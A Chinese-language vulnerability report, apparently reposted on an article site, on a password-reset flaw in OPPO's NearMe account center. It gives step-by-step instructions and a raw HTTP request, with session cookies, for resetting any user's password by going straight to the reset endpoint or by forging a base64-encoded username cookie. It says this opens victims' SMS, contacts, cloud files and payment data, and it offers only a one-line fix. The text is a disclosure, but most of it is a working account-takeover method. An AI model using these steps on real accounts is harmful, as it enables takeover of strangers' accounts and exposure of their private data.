今天看啥
热点:

OPPO手机同步密码随意修改,短信通讯录随意查看,网盘,笔记都可以随便看,还涉及到钱

 
使用密码找回功能,找到一个存在的用户
然后提交找回申请,跳过选择找回方式。
 
直接访问 http://uc.nearme.com.cn/usercenter/resetPassword.do
 
输入新密码,提示修改成功
 
返回登录页登录
登录成功,随意查看信息,下面是两个账号的信息。
 
 





其实不用按照上面的操作也可以直接修改密码,
 
Request URL:http://uc.nearme.com.cn/usercenter/resetPassword.do

Request Method:POST

Status Code:200 OK

Request Headersview source

Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Encoding:gzip,deflate,sdch

Accept-Language:en-US,en;q=0.8,zh-CN;q=0.6,zh;q=0.4

Connection:keep-alive

Content-Length:34

Content-Type:application/x-www-form-urlencoded

Cookie:JSESSIONID=aaay1gJXnU7768sxcR6iu; OPPOSID=a65fb58f34304ac8a8223bf332274f46; NEARME_USERNAME_COOKIE=ZmluZHg5MDc%3D

Host:uc.nearme.com.cn

Origin:http://uc.nearme.com.cn

Referer:http://uc.nearme.com.cn/usercenter/resetPassword.do

User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36

 

 
 
 
直接设置NEARME_USERNAME_COOKIE的值提交,该值为base64_encode编码
 
 
修复方案:
真的发邮件或手机验证码校验

www.bkjia.comtruehttp://www.bkjia.com/wzaq/621100.htmlTechArticleOPPO手机同步密码随意修改,短信通讯录随意查看,网盘,笔记都可以随便看,还涉及到钱 使用密码找回功能,找到一个存在的用户 然后提...

相关文章

相关搜索: OPPO 手机 同步

帮客评论

视觉看点